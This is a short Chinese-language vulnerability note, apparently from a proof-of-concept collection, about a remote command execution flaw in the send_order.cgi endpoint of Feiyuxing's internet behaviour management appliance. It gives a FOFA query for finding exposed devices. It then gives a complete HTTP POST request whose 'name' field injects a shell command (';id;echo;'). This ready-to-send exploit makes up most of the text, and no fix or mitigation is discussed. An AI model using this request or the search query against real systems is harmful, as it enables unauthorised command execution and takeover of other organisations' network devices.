飞鱼星智能上网行为管理系统send_order存在远程命令执行漏洞,攻击者可通过该漏洞获取服务器权限。
- 飞鱼星智能上网行为管理系统
- fofa
<font style="color:rgb(51, 51, 51);">title="飞鱼星企业级智能上网行为管理系统"</font>
- 特征
POST /send_order.cgi?parameter=operation HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 62
{"opid":"777777777777777777","name":";id;echo;","type":"rest"}
更新: 2024-09-03 14:56:23
原文: https://www.yuque.com/xiaokp7/ocvun2/ewvgyd0pqty4snsb